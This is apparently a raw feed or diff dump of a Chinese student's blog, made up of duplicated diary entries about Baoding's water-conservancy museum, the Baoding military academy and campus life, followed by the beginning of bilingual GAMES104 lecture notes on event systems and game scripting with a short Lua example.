    ​2012 年 7 月 21 日,河北保定普降特大暴雨,致全市受灾人口 85.3 万人,受灾面积 413 万亩,涉及 11 个县(市)、121 个乡(镇),因灾死亡 31 人、失踪 17 人,紧急转移疏散 15.9 万人,直接经济损失 95.3 亿元。其中,涞源、涞水、易县损失严重。

    ​里面的展馆特别新,我感觉油漆味都没有散干净。

    ​看样子保定是个很容易闹洪水的地方。展馆里介绍了很多现代对保定制水所取得的成就,大肆邀功🤧。然而河北保定在经历了 2012.7.21 的特大暴雨后,在应对 2023.7.31 的台风中似乎没能做出什么进步。直到现在,保定下一个稍微大一点的雨,学校里都能产生不浅的积水🤬。

    (京爷吉祥😭)

    ​这里说保定是老北京永定河泄洪的一个地方,保定人看了鼻子不得气歪😠。


    ​这里还有一段保定治水史和保定发展史,记录一下。

    保定治水史
    前言

    ​独特的自然地理、水文水资源条件和区域发展需求,使保定水利具有显著的区域性和时代性。尧统治时,保定所在的冀州开世纪大洪水治理之肇始。春秋战国时期,保定拥有富饶的督亢灌区和相对发达的城市供排水系统。宋辽对峙时期,保定境内的白沟和雄县等地成为两国边界。为抵御辽军南侵,利用保定至渤海间的大清河、易水等河流及沼泽淀泊建成一条水上军事防线——“塘泺防线”。元明清三代定都北京,为保障首都防洪安全,开始大规模修筑潴龙河、永定河、白洋淀等堤防工程体系(京爷吉祥😭)。清雍正年间,怡亲王允祥则在京畿地区大规模营田种稻。近代,保定水利在艰难的环境下仍持续发展。新中国成立后,保定市的水利事业得到前所未有的发展,是历史上水利建设规模最大、效益最显著、成果最辉煌的时期。十八大以来,围绕安全水利、民生水利、资源水利、生态水利、智慧水利和文化水利等六大水利,保定市如火如茶地开展水利建设,掀起历史上又一次建设高潮,并开启“水兴保定”新时代。

    历史建制

    ​保定水利的发展与建置沿革具有密切的关系。春秋战国时期,燕国和中山国分别在保定以北和以南建都,后赵国灭中山而代之,保定因有“燕南赵北”之称。西汉高祖六年(前 201 年),在今满城置北平县,寓“平定北方”之意。宋建隆元年(960)设保塞军,离“保卫边塞”之意;太平兴国六年(981),改为保州。元正大四年(1227)张柔重建保州城后,改称顺天路;至元十二年(1275)改为保定路。“保定”之名自此始,寓“保卫大都,安定天下”之意(京爷吉祥😭)。明初置保定府,永乐元年(1403)迁都北京,并将大宁都指挥使司迁驻保定保定成为“都南屏障”(京爷吉祥😭)。清康熙八年(1669),直隶巡抚驻扎保定,保定成为直隶省会和“冀北干城”。1948 年,保定解放,建保定市。历史时期,保定不同阶段的水利建设具有不同的特征。

    保定古代史
    先秦——燕南赵北

    ​ 西周初,周武王封召公奭于燕,建都于蓟(今北京西南),今涞水一代属燕地。
    ​ 春秋时期,今保定北部属燕,南部属鲜虞(春秋末年改名中山)。
    ​ 战国时期,今保定北部属燕,南部属中山,赵灭中山后属赵,故有“燕南赵北”之称。燕昭王在今易县建下都。

    秦汉时期——县治分设

    ​ 秦统一中国后,实行郡县制。今保定南部属恒山郡,北部大多属广阳郡,另有广昌县(今涞源县)属代郡。秦代在此置县 7 个,即曲阳、涿县、广昌、范阳(今定兴)、易县(今雄县)、曲逆(今顺平)和庆都(今望都)。汉代实行郡国制,西汉新置县 18 个,东汉新置县 3 个。

    魏晋南北唐五代十国

    ​ 这才发现,唐朝时期的河北几乎没啥历史……其它时段的保定估计老惨了😭,更没空整水利了。

    宋代——保州设立

    ​ 宋建隆元年(960),在清苑县设保塞军。
    ​ 建隆六年(981),改清苑县为宝塞县,保塞军升保州。
    ​ 金天会七年(1129),在保州设顺天军,保州为顺天军节度使驻地。

    元代——保定设郡及保定之名的开始

    ​ 元太宗十一年(1239),以保州为顺天路治所。元至元十二年(1275),改顺天路为保定路,
    “保定”之名至此始,寓“保卫大都,安定天下”之意。

    明代——保定建府

    ​ 明洪武元年(1368),改保定路为保定府。洪武二十年(1387 年)设置大宁都司,治所在大宁卫(今内蒙古宁城西),永乐元年(1403)迁至保定。永乐十九年(1421),正式迁都北平(今北京)保定成为都南重镇。

    清代——保定成为直隶省会及冀北干城

    ​ 清康熙八年(1669),直隶巡抚由正定移驻保定,保定成为直隶省省会。
    雍正二年(1724),特授直隶巡抚李维钧为直隶总督,保定成为直隶总督驻地。
    至此至清亡(1911),保定一直是河北的政治、经济、文化、教育和军事中心,因有“冀北干城”之称。

    燕南赵北 水利肇始

    ​唐尧统治时期发生世纪大洪水,大禹在冀州的治水开世纪大洪水治理之肇始。四季分明的气候特点、河流淀泊众多的水资源条件、地处中原农耕与北方游牧民族分界的独特地理位置,使保定地区在战国时期即拥有富饶的督亢灌区和相对发达的区间航运,规划建成令人惊叹的城市排水系统,衍生出“风萧易水寒”的悲壮历史,并在北魏时期孕育出《水经注》等富有文学色彩的地理名著。

    治水著名人物 治水著名人物 治水著名人物
    治水著名人物

    ​没想到吧!这些人都是保定的。

    《直隶总督方观承视察清河道署》

    ​该作品反映的是清乾隆年间周元理任清河道员时,曾任过清河道员、时任直隶总督的方观承前来视察,周元理正与其他陪同官员在清河道署接待奏事的场景。

    取水设备 取水设备 取水设备 取水设备

    ​还有一些取水设备,可以亲自体验!就能看到小孩子们在这里玩水。

    东湖公园

    ​古莲花池这个学期去过一次了,就算了。

    ​来东湖公园看看荷花等各种花,平替一下。

    花花 花花 花花 花花 花花 花花 花花 花花 花花 花花
    花花

    6.24

    荷花 荷花
    荷花

    ​冀大特产,双色荷花!

    不正宗赣面

    ​冀大卖牛肉汤的食堂开了家赣面,让我试试。

    ​虽然它一点也不正宗,但我觉得还蛮好吃的,甚至比正宗的还要好吃😇。

    紫色花

    6.25

    6.26

    红配绿,______

    李子

    ​冀大里长了很多李子,可以打来吃。

    看来学校李子还蛮多的
    yes
    我已经打了两次了
    拿棍子打的

    6.27

    6.28

    强者的座位

    一看就是强者的座位😍

    ​伟哥要去厦门打工了,祝他事业顺利!

    ​于是我顺势坐上了他的工位。在空调底下感觉凉快了不少😍。

    ​再夸一次伟哥是一个很自律的人,相比之下,我还是太浮躁了😪。

    6.30


    东北大白梨

    ​试一试在南方根本买不到的东北特色饮品!噢!我的上帝啊!这个味道就跟牙膏兑水的感觉一样。


    ​买好了去广州的票,感觉日子又有盼头了😍!

    ]]>
    + 前言

    每日任务

    ​不出意外的话,这将是这个学期倒数第二篇 Diary 了,坚持住!勇士!相信圣光会在最需要你的时候显现🤩🤩🤩!

    正文

    6.17-6.21

    ​整理 6.16 在国博拍的照片中……国博真是太好玩了,我评价为北京最佳😭。为所拍的文物查阅各种资料,从中学习到了不少东西;为了便于更好地在网页上展示我在国博扫的货,还特意设计了一个前端方法,我真是太雅了🤤!

    ​歷史學家卡爾(E. H. Carr,1892~1982 年)曾說:「歷史是歷史家和歷史事實之間不斷交互作用的過程,是現在與過去無止盡的對話。」仔細分析這段話可以發現歷史存在「兩個時間和空間」,一個是歷史事件發生的時空環境,另一個是歷史家所處的時空環境,過去的歷史固然應該以過去的時空條件去解釋、理解其背景和意義,不過也必須注意到歷史家所存在的時間與空間,因為不同的歷史家處於不同的時間、空間,和歷史記錄的對話也將呈現不同的樣貌。

    ​同時,我們也必須有所警覺,長期以來的歷史記錄,以官方史家所撰寫的史書(正史)論述為主,多半以統治者的觀點書寫,因此必須多方蒐集各種史料,更為深入歷史情境,理解不同時代人們所存在的歷史時空環境,包括政治制度、社會規範,以及與外界互動的情形,才能對歷史日常有比較客觀的認識。

    ​挺感谢初中的历史老师,是她让我激发起了对历史的兴趣,让我不至于在国博里像个白痴一样漫无目的地参观。我犹记得她曾经说过的一句话:“这节课虽然中考不考,但是我认为这是一个中学生所应该了解的。”我能感受到她对这门学科真正的理解和热爱,而不是拘泥在教条中。我想,不拘泥于教条,不随人云亦云,拥有独立辩证思考的能力,能够以史为鉴并应用到其他领域中,才是学习历史的最大意义吧🤔。同时,我很鄙视那些德不配位,溜须拍马,见风使舵的“砖家”(不只于历史领域)。

    ​很多华丽的文物背后其实蛮恐怖的。

    ​我翻开历史一查,这历史没有年代,歪歪斜斜的每页上都写着“仁义道德”几个字。我横竖睡不着,仔细看了半夜,才从字缝里看出字来,满本都写着两个字是“吃人”!

    ——鲁迅

    ​同时感觉中国发展不平衡的现象十分明显🫥,这是一个复杂的社会问题。

    ​读研后开始喜欢逛博物馆,到现在也逛了不老少。整理照片的时候还发现曾在不同博物馆里看到了同样的东西,就挺搞笑的。

    6.23 特别篇——要润了再去莲池逛逛吧

    ​这天中午想去市区走走。坐公交去老校区解决一下午饭问题。午饭 Only¥9,真便宜呀真便宜。

    假 · 后母戊鼎

    ​岁逢辛卯。序属深秋,河北大学迎来九十华诞。时逢盛世,学府生辉,古城各界共瞻文化盛典。为感谢多年来河北大学传承文化、培育英才,建设银行保定分行特铸青铜鼎,以铭功铵绩,昭示来兹。其铭曰

    京畿名校,燕赵学府;九十看秋,创业奔流;
    求是先风,驾学诚行;心忧天下,历史使命;
    培育英才,桃李芬芳;银校携手,驰援相助;
    诚纳俊杰,良禽栖木;融资助收,服务师生;
    合作共赢,砥砺前行;奋翮高飞,再创辉煌。

    ​冀大博物馆前面的假 · 后母戊鼎。

    某花

    ​盛夏,又是河北花开放的另一高峰。

    保定军校

    ​保定陆军军官学校始建于 1902 年,前身为北洋陆军行营将弁学堂、陆军速成武备学堂、陆军预备大学堂等。1912 年正式创办保定陆军军官学校,1923 年 8 月停办。前后共培养出 11000 余名学生,仅后来成为将军的就有 1500 余人,被称为“将军的摇篮”。

    ​啊!河北保定!曾经也辉煌过。

    军校广场雕像 军校广场雕像
    军校广场雕像 军校广场雕像 军校广场雕像 军校广场雕像
    军校广场雕像
    将军摇篮简介

    ​雕塑主体是一位身着戎装骑马驰骋的将军代表,象征着保定军校是诞生将车的摇篮;

    ​圆柱与雕塑的方形基座组成天圆地方的文化符号,象征着需校学员——胸怀报国理想而驰聘于天地之间的志士;

    ​圆柱体的外形还代表“1”,表示保定军校是中国近代第一所正规化的军事院校;雕塑总高 19.02 米,象征着保定军校始办于 1902 年。基座的台阶为 9 级代表着保定军校共培养了 9 期学员;中心圆柱以环形的浮雕进行装饰,从而构成雕塑整体的有机组成部分。浮雕正面是 5 位军官全身正像,是保定军校所设置的 5 科专业的军人代表,周边的图案则是对步兵、骑兵、工兵、炮兵、辎重兵的形象化描述。

    棋类运动 棋类运动
    棋类运动

    ​无聊地把军校广场上的象棋棋盘复位,结果发现少了仨子😅。

    ​这个围棋不让把棋子拿开我都不知道该怎么下。

    保定军校

    ​啊!保定军校,上承北洋,下开黄埔。因为暑假前特想去广州逛逛,就想再来看看传说中“下开黄埔”的保定军校。

    保定军校纪念馆

    ​保定军校(1902~1923 年)是自晚清至民国时期,由直隶总督兼北洋大臣袁世凯在保定创办的一系列军事教育机构的统称,是中国军事大变革的重要标志,开创了近代中国正规化军事教育之先河。期间开办的北洋行营将弁学堂、北洋陆军速成武备学堂、陆军部陆军速成学堂、陆军军官学堂(陆军预备大学堂)、陆军军官学校等学校。其中,民国建立后开办的陆军军官学校,是中国近代史上规模最大、设施最完备、学制最正规、门类最齐全的军事学府,自 1912 年开办到 1923 年停办,共办 9 期,设步科、骑科、炮科、工科、辎重科等兵科,经历赵理泰、蒋方震、曲同丰、王汝贤、杨祖德、贾德耀、张鸿绪、孙树林等 8 位校长,毕业学生 6574 人。从 1902 年开办的北洋行营将升学堂算起,这里共培养出 11000 余名军事领导人才,仅后来成为将军的有 2000 余人,被誉为“将军摇篮”。其中,蒋介石、张群、李济深、陈调元、叶挺、邓演达、赵博生、董振堂、蒋光鼐、陈铭枢、刘文辉、唐生智、张治中、傅作义、顾祝同、黄琪翔、钱大钧、张克侠、何基沣、陶峙岳、陈诚、白崇禧等均为中国近现代史上的风云人物,保定军校也因此蜚声海内外。

    陆军军官学校

    ​恭喜!保定军校从 2 月份检修到现在还不给开😠!

    大慈阁

    大慈阁 大慈阁
    大慈阁

    ​坐公交车前往市中心。

    西大街

    直隶第一街 直隶第一街
    月满西街 · 情定古城 人民照像稻香村 可爱熊熊
    直隶第一街

    ​经过保定政府苦心经营,西大街总算有了些许生气!

    民国风

    ​感觉像上下杭。

    套圈圈

    ​在保定,感觉这种项目特别多。我若去玩,必白送钱。

    老乡你好

    ​我要笑死。

    前面的区域,以后再来探索吧!

    ​前面好像是开什么音乐会,不让进。

    清河道署

    保定水利博物馆

    ​来参观一下之前从未去过的一个小博物馆——清河道署!是清朝直隶时期管理水利的地方。啊!河北保定!曾经也辉煌过。

    保定水利博物馆
    保定水利博物馆 保定水利博物馆 保定水利博物馆 保定水利博物馆 保定水利博物馆
    开冲!

    ​没人,不用预约,不用钱,身份证给保安,爷冲了!

    保定水系

    ​啊!河北保定!拒马河府河白洋淀,都属于海河水系。

    一定要根治海河
    一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河 一定要根治海河
    一定要根治海河

    ​中华人民共和国成立后,毛泽东主席发出了一定要根治海河的号召。自 1958 年开始,海河流域人民按照统一规划、综合治理的方针,从上游到下游,从支流到干流,对海河水系进行了全面根治。上百万治河大军包括中小学生、家庭妇女也挥锨上阵,完成了大大小小一系列整修工程,从根本上对海河进行了治理,终于使海河旧貌换新颜。

    ​海河自天津市区的三岔河口贯穿市区,至大沽口处入海,自古以来就养育了天津人民。海河对天津城市的形成和发展起了举足轻重的作用,但是,在旧时代也给海河流域的人民带来过不少灾难。海河水系支流众多,一到汛期同时涨水,而入海口处却肚大嘴小,宣泄不畅,水流速度越来越慢,泥沙沉积日益严重,排洪能力越来越差,常常形成海河流域的洪涝灾害,给广大人民群众的生活和海河地区社会经济发展造成很大危害。据记载,从 1368 年到 1948 年的 580 年间,海河流域发生过 387 次严重水灾,天津市被淹泡过 70 多次。

    ​河北省地级市天津被水淹了!河北省会保定不能坐视不管😭!

    7.21 暴雨

    ​2012 年 7 月 21 日,河北保定普降特大暴雨,致全市受灾人口 85.3 万人,受灾面积 413 万亩,涉及 11 个县(市)、121 个乡(镇),因灾死亡 31 人、失踪 17 人,紧急转移疏散 15.9 万人,直接经济损失 95.3 亿元。其中,涞源、涞水、易县损失严重。

    ​里面的展馆特别新,我感觉油漆味都没有散干净。

    ​看样子保定是个很容易闹洪水的地方。展馆里介绍了很多现代对保定制水所取得的成就,大肆邀功🤧。然而河北保定在经历了 2012.7.21 的特大暴雨后,在应对 2023.7.31 的台风中似乎没能做出什么进步。直到现在,保定下一个稍微大一点的雨,学校里都能产生不浅的积水🤬。

    (京爷吉祥😭)

    ​这里说保定是老北京永定河泄洪的一个地方,保定人看了鼻子不得气歪😠。


    ​这里还有一段保定治水史和保定发展史,记录一下。

    保定治水史
    前言

    ​独特的自然地理、水文水资源条件和区域发展需求,使保定水利具有显著的区域性和时代性。尧统治时,保定所在的冀州开世纪大洪水治理之肇始。春秋战国时期,保定拥有富饶的督亢灌区和相对发达的城市供排水系统。宋辽对峙时期,保定境内的白沟和雄县等地成为两国边界。为抵御辽军南侵,利用保定至渤海间的大清河、易水等河流及沼泽淀泊建成一条水上军事防线——“塘泺防线”。元明清三代定都北京,为保障首都防洪安全,开始大规模修筑潴龙河、永定河、白洋淀等堤防工程体系(京爷吉祥😭)。清雍正年间,怡亲王允祥则在京畿地区大规模营田种稻。近代,保定水利在艰难的环境下仍持续发展。新中国成立后,保定市的水利事业得到前所未有的发展,是历史上水利建设规模最大、效益最显著、成果最辉煌的时期。十八大以来,围绕安全水利、民生水利、资源水利、生态水利、智慧水利和文化水利等六大水利,保定市如火如茶地开展水利建设,掀起历史上又一次建设高潮,并开启“水兴保定”新时代。

    历史建制

    ​保定水利的发展与建置沿革具有密切的关系。春秋战国时期,燕国和中山国分别在保定以北和以南建都,后赵国灭中山而代之,保定因有“燕南赵北”之称。西汉高祖六年(前 201 年),在今满城置北平县,寓“平定北方”之意。宋建隆元年(960)设保塞军,离“保卫边塞”之意;太平兴国六年(981),改为保州。元正大四年(1227)张柔重建保州城后,改称顺天路;至元十二年(1275)改为保定路。“保定”之名自此始,寓“保卫大都,安定天下”之意(京爷吉祥😭)。明初置保定府,永乐元年(1403)迁都北京,并将大宁都指挥使司迁驻保定保定成为“都南屏障”(京爷吉祥😭)。清康熙八年(1669),直隶巡抚驻扎保定,保定成为直隶省会和“冀北干城”。1948 年,保定解放,建保定市。历史时期,保定不同阶段的水利建设具有不同的特征。

    保定古代史
    先秦——燕南赵北

    ​ 西周初,周武王封召公奭于燕,建都于蓟(今北京西南),今涞水一代属燕地。
    ​ 春秋时期,今保定北部属燕,南部属鲜虞(春秋末年改名中山)。
    ​ 战国时期,今保定北部属燕,南部属中山,赵灭中山后属赵,故有“燕南赵北”之称。燕昭王在今易县建下都。

    秦汉时期——县治分设

    ​ 秦统一中国后,实行郡县制。今保定南部属恒山郡,北部大多属广阳郡,另有广昌县(今涞源县)属代郡。秦代在此置县 7 个,即曲阳、涿县、广昌、范阳(今定兴)、易县(今雄县)、曲逆(今顺平)和庆都(今望都)。汉代实行郡国制,西汉新置县 18 个,东汉新置县 3 个。

    魏晋南北唐五代十国

    ​ 这才发现,唐朝时期的河北几乎没啥历史……其它时段的保定估计老惨了😭,更没空整水利了。

    宋代——保州设立

    ​ 宋建隆元年(960),在清苑县设保塞军。
    ​ 建隆六年(981),改清苑县为宝塞县,保塞军升保州。
    ​ 金天会七年(1129),在保州设顺天军,保州为顺天军节度使驻地。

    元代——保定设郡及保定之名的开始

    ​ 元太宗十一年(1239),以保州为顺天路治所。元至元十二年(1275),改顺天路为保定路,
    “保定”之名至此始,寓“保卫大都,安定天下”之意。

    明代——保定建府

    ​ 明洪武元年(1368),改保定路为保定府。洪武二十年(1387 年)设置大宁都司,治所在大宁卫(今内蒙古宁城西),永乐元年(1403)迁至保定。永乐十九年(1421),正式迁都北平(今北京)保定成为都南重镇。

    清代——保定成为直隶省会及冀北干城

    ​ 清康熙八年(1669),直隶巡抚由正定移驻保定,保定成为直隶省省会。
    雍正二年(1724),特授直隶巡抚李维钧为直隶总督,保定成为直隶总督驻地。
    至此至清亡(1911),保定一直是河北的政治、经济、文化、教育和军事中心,因有“冀北干城”之称。

    燕南赵北 水利肇始

    ​唐尧统治时期发生世纪大洪水,大禹在冀州的治水开世纪大洪水治理之肇始。四季分明的气候特点、河流淀泊众多的水资源条件、地处中原农耕与北方游牧民族分界的独特地理位置,使保定地区在战国时期即拥有富饶的督亢灌区和相对发达的区间航运,规划建成令人惊叹的城市排水系统,衍生出“风萧易水寒”的悲壮历史,并在北魏时期孕育出《水经注》等富有文学色彩的地理名著。

    治水著名人物 治水著名人物 治水著名人物
    治水著名人物

    ​没想到吧!这些人都是保定的。

    《直隶总督方观承视察清河道署》

    ​该作品反映的是清乾隆年间周元理任清河道员时,曾任过清河道员、时任直隶总督的方观承前来视察,周元理正与其他陪同官员在清河道署接待奏事的场景。

    取水设备 取水设备 取水设备 取水设备

    ​还有一些取水设备,可以亲自体验!就能看到小孩子们在这里玩水。

    东湖公园

    ​古莲花池这个学期去过一次了,就算了。

    ​来东湖公园看看荷花等各种花,平替一下。

    花花 花花 花花 花花 花花 花花 花花 花花 花花 花花
    花花

    6.24

    荷花 荷花
    荷花

    ​冀大特产,双色荷花!

    不正宗赣面

    ​冀大卖牛肉汤的食堂开了家赣面,让我试试。

    ​虽然它一点也不正宗,但我觉得还蛮好吃的,甚至比正宗的还要好吃😇。

    紫色花

    6.25

    6.26

    红配绿,______

    李子

    ​冀大里长了很多李子,可以打来吃。

    看来学校李子还蛮多的
    yes
    我已经打了两次了
    拿棍子打的

    6.27

    6.28

    强者的座位

    一看就是强者的座位😍

    ​伟哥要去厦门打工了,祝他事业顺利!

    ​于是我顺势坐上了他的工位。在空调底下感觉凉快了不少😍。

    ​再夸一次伟哥是一个很自律的人,相比之下,我还是太浮躁了😪。

    6.30


    东北大白梨

    ​试一试在南方根本买不到的东北特色饮品!噢!我的上帝啊!这个味道就跟牙膏兑水的感觉一样。


    ​买好了去广州的票,感觉日子又有盼头了😍!

    ]]>
    @@ -1502,7 +1502,7 @@ /posts/Paper-Intelligent%20Data%20Analysis/ -
    ]]>
    +
    ]]>
    @@ -1527,7 +1527,7 @@ /posts/Diary-18-%E6%88%91%E8%A6%81%E8%80%83%E5%85%AD%E7%BA%A7%EF%BC%81/ - 前言

    ​6.16 在北京玩 high 了,姗姗来迟的本学年第 18 篇 Diary😅。

    6.3-6.16

    ​6.3-6.4 这两天的每日任务点还是被堵了进不去!

    正文

    6.8

    与伟哥拱趴中

    ​跟伟哥午饭的时候拱趴被他舍友偷拍了。

    6.9

    ​旁晚去东湖公园放放松~

    日落 日落

    ​拍出来的没有看的时候好看!调色一下。

    宁静歌谣石沉大海

    6.11

    火焰山?什么弟弟

    ​这段时间特别热,石家庄的气温直接爆表了。印象中去年这个时候也是这样,不过只持续很短一段时间。

    好看的冀大图书馆

    ​在冀大图书馆准备六级的日子就要结束了!

    肉粽

    ​77 从家里包了粽子回来。北方吃的都是甜粽子,77 为了体验一下南方风味,包了一个五花肉馅的咸粽子,吃起来还挺像回事的。有些凡哥就接受不了咸粽子的美味😠!

    6.13

    6.14

    盗版冰墩墩

    ​吃午饭的时候被人送了个盗版冰墩墩,然后要求下载抖音极速版帮她扫个码,扫完才感觉被坑了😬。

    6.15

    ​考完了六级,这次我觉得还行😭J 局我觉得我能赢😭。

    ​有些 pro 凡报考了多次六级却从来不准备,太不上进了啊 pro 凡😭。

    6.16

    ]]>
    + 前言

    ​6.16 在北京玩 high 了,姗姗来迟的本学年第 18 篇 Diary😅。

    6.3-6.16

    ​6.3-6.4 这两天的每日任务点还是被堵了进不去!

    正文

    6.8

    与伟哥拱趴中

    ​跟伟哥午饭的时候拱趴被他舍友偷拍了。

    6.9

    ​旁晚去东湖公园放放松~

    日落 日落

    ​拍出来的没有看的时候好看!调色一下。

    宁静歌谣石沉大海

    6.11

    火焰山?什么弟弟

    ​这段时间特别热,石家庄的气温直接爆表了。印象中去年这个时候也是这样,不过只持续很短一段时间。

    好看的冀大图书馆

    ​在冀大图书馆准备六级的日子就要结束了!

    肉粽

    ​77 从家里包了粽子回来。北方吃的都是甜粽子,77 为了体验一下南方风味,包了一个五花肉馅的咸粽子,吃起来还挺像回事的。有些凡哥就接受不了咸粽子的美味😠!

    6.13

    6.14

    盗版冰墩墩

    ​吃午饭的时候被人送了个盗版冰墩墩,然后要求下载抖音极速版帮她扫个码,扫完才感觉被坑了😬。

    6.15

    ​考完了六级,这次我觉得还行😭J 局我觉得我能赢😭。

    ​有些 pro 凡报考了多次六级却从来不准备,太不上进了啊 pro 凡😭。

    6.16

    ]]>
    @@ -1554,7 +1554,7 @@ /posts/GAMES104-Gameplay/ - 资源

    课程

    第十五节:游戏引擎的 Gameplay 玩法系统基础

    Gameplay Complexity and Building Blocks

    ​游戏复杂性和构建模块

    Outline of Gameplay System

    ​游戏系统概述

    Gameplay complexity and Building Blocks

    ​游戏复杂性和构建模块

    • Overview

      概述

    • Event Mechanism

      事件机制

    • Script System

      脚本系统

    • Visual Script

      可视化脚本

    • Character, Control and Camera

      角色、控制和相机

    AI

    Challenges in GamePlay (1/3)

    ​游戏玩法的挑战

    Cooperation among multiple systems

    ​多系统协作

    webp

    Challenges in GamePlay (2/3)

    Diversity of game play in the same game

    ​单种游戏多种玩法

    webp

    Challenges in GamePlay (3/3)

    Rapid iteration

    ​快速迭代

    webp

    这款游戏在研发过程中了改变了其玩法

    Epic acknowledged that within the Fortnite fundamentals, they could also do a battle royale mode, and rapidly developed their own version atop Fortnite in about two months.

    ​Epic 承认,在 Fortnite 的基本原理内,他们也可以做一款大逃杀模式,并在大约两个月内迅速在 Fortnite 的基础上开发了自己的版本。

    Event Mechanism

    ​事件机制

    Let Objects Talk

    ​让不同对象之间联系

    webp

    Event/Message Mechanism

    ​事件/消息机制

    • Abstract the world communication to messages

      将世界通信抽象为消息

    • Decoupling event sending and handling

      解耦事件发送和处理

    webp

    ​使用消息机制便于不同对象之间联系

    Publish-subscribe Pattern

    ​发布-订阅模式

    • Publisher categorizes published messages (events) into classes

      发布者将发布的消息(事件)分类为不同的类别

    • Subscriber receive messages (events) that are of interest without knowledge of which publishers

      订阅者接收感兴趣的消息(事件),但不知道是哪个发布者

    webp

    3 Key Components of Publish-subscribe Pattern

    ​发布-订阅模式的 3 个关键组件

    • Event Definition

      事件定义

    • Callback Registration

      回调注册

    • Event Despatching

      事件分派

    Event Definition

    ​事件定义

    webp

    ​定义事件的类型(枚举)和变量

    Type and Arguments

    ​类型和参数

    webp

    Impossible for hardcode

    ​硬编码不可能

    • Editable

      可编辑性

    webp

    Callback Registration

    ​回调注册

    Callback (function)

    ​回调(函数)

    • Any reference to executable code that is passed as an argument to another piece of code

      对作为参数传递给另一段代码的可执行代码的任何引用

    ​字面上的理解,回调函数就是一个参数,将这个函数作为参数传到另一个函数里面,当那个函数执行完之后,再执行传进去的这个函数。这个过程就叫做回调。

    webp

    Object Lifespan and Callback Safety

    ​对象生命周期和回调安全

    Time points of registration and execution differs

    注册执行的时间点不同

    webp

    webp

    ​执行回调函数时,回调函数所在的对象已经被销毁了,报错。

    Object Strong Reference

    ​对象强引用

    webp

    Make sure to unregister callback function before delete objects, otherwise it will cause memory leak!

    ​删除对象前请务必注销回调函数,否则会造成内存泄漏!

    Prevent object from de-allocation as long as callback function still registered

    ​只要回调函数仍然注册,就防止对象被取消分配

    Object Weak Reference

    ​对象弱引用

    webp

    Object could be de-allocated, and wilcheck callback function if valid

    ​对象可以被取消分配,并且将检查回调函数是否有效

    Event Dispatch

    ​事件分派

    • Send event to appropriate destination

      将事件发送到适当的目的地

    webp

    Event Dispatch: Immediate

    ​事件分派:立即

    webp

    parent function returns after callback function

    ​回调函数之后父函数返回,这么做可能出现如下问题:

    • Deep well of callbacks

      回调的深井

    webp

    ​这么做可能导致 Callstack 过长,占用内存。

    • Blocked by function

      被函数阻止

    ​期间某个函数耗时较长,导致帧率突然下降。

    webp

    The bleeding effect should be loaded but cost plenty of time in this function call

    ​应该加载出血效果,但在此函数调用中会花费大量时间

    • Difficult for parallelization

    ​难以并行化

    webp

    Event Queue

    ​事件队列

    Basic implementation

    ​基本实现

    • Store events in queue for handling at an arbitrary future time

      将事件存储在队列中,以便在未来的任意时间进行处理

    webp

    Event Serializing and Deserializing

    ​事件序列化和反序列化

    • To store various types of events

      存储各种类型的事件

    webp

    Event Quene

    ​事件队列

    Ring buffer

    ​环形缓冲区

    webp

    Batching

    ​批处理

    webp

    Problems of Event Queue (1/2)

    ​事件队列的问题

    • Timeline not determined by publisher

      事件发布者尚未确定时间表

    webp

    Problems of Event Queue (2/2)

    • One-frame delays

      一帧延迟

    webp

    Game Logic

    ​游戏逻辑

    Early Stage Game Logic Programming

    ​早期游戏逻辑编程

    Compiled language (mostly C/C++)

    ​编译语言(主要是 C/C++)

    • Compiled to machine code with high performance

      编译为高性能机器代码

    • More easier to use than assembly language

      比汇编语言更易于使用

    webp

    ​修改某个游戏逻辑需要重新编译整个游戏。

    Problem of Compiled Languages

    ​编译语言的问题

    Game requirements get complex as hardware evolves

    ​随着硬件的发展,游戏要求变得复杂

    • Need quick iterations of gameplay logic

      需要快速迭代游戏逻辑

    Issues with compiled language

    ​编译语言的问题

    • Need recompilation with even a little modification

      即使进行少量修改也需要重新编译

    • Program can easily get crashed with incorrect codes

      程序很容易因代码错误而崩溃

    Glue Designers and Programmers

    ​将设计师和程序员连接起来

    • Get rid of inefficient communication between designers and programmers

      摆脱设计师和程序员之间低效的沟通

    • Designers need direct control of gameplay logic

      设计师需要直接控制游戏逻辑

    • Artists need to quickly adjust assets at the runtime environment

      艺术家需要在运行时环境中快速调整资产

    webp

    Scripting Languages

    ​脚本语言

    • Support for rapid iteration

      支持快速迭代

    • Easy to learn and write

      易学易写

    • Support for hot update

      支持热更新

    • Stable, less crash by running in a sandbox

      沙盒运行稳定,崩溃少

    function tick(delta)
    if input_system.isKeyDown(Keycode.W) then
    self:moveForward(delta)
    elseif input_system.isKeyDown(Keycode.S) then
    self:moveBackward(delta)
    end

    if input_system.iskeyDown(Keycode.MouseLeft) then
    self:fire(delta)
    end
    ...
    end
    Lua Script Example

    How Script Languages Work

    ​脚本语言的工作原理

    Script is converted to bytecode by a compiler first, then run on a virtual machine

    ​脚本首先由编译器转换为字节码,然后在虚拟机上运行

    webp

    Object Management between Scripts and Engine (1/2)

    ​脚本和引擎之间的对象管理 (1/2)

    Object lifetime management in native engine code

    原生引擎代码中的对象生命周期管理

    • Need to provide an object lifetime management mechanism

      需要提供对象生命周期管理机制

    • Not safe when script uses native objects (may have been destructed)

      当脚本使用原生对象时不安全(可能已被破坏)

    webp

    Object Management between Scripts and Engine (2/2)

    ​脚本和引擎之间的对象管理 (2/2)

    Object lifetime management in script

    脚本中的对象生命周期管理

    • The lifetime of objects are auto managed by script GC

      对象的生命周期由脚本 GC 自动管理

    • The time when object is deallocated is uncontrolled (controlled by GC)

      对象被释放的时间不受控制(由 GC 控制)

    • Easy to get memory leak if reference relations get complex in script

      如果脚本中的引用关系变得复杂,则容易发生内存泄漏

    webp

    Architectures for Scripting System (1/2)

    ​脚本系统架构 (1/2)

    Native language dominants the game world

    ​原生语言主导游戏世界

    • Most gameplay logic is in native code

      大多数游戏逻辑都采用原生代码

    • Script extends the functionality of native engine code

      脚本扩展了原生引擎代码的功能

    • High performance with compiled language

      编译语言带来高性能

    webp

    Architectures for Scripting System (2/2)

    Script language dominants the game world

    ​脚本语言主导游戏世界

    • Most gameplay logic is in script

      大多数游戏逻辑都在脚本中

    • Native engine code provides necessary functionality to script

      原生引擎代码为脚本提供必要的功能

    • Quick development iteration with script language

      使用脚本语言快速进行开发迭代

    webp

    Advanced Script Features - Hot Update

    ​高级脚本功能 - 热更新

    Allow modifications of script while game is running

    允许在游戏运行时修改脚本

    • Quick iteration for some specific logic

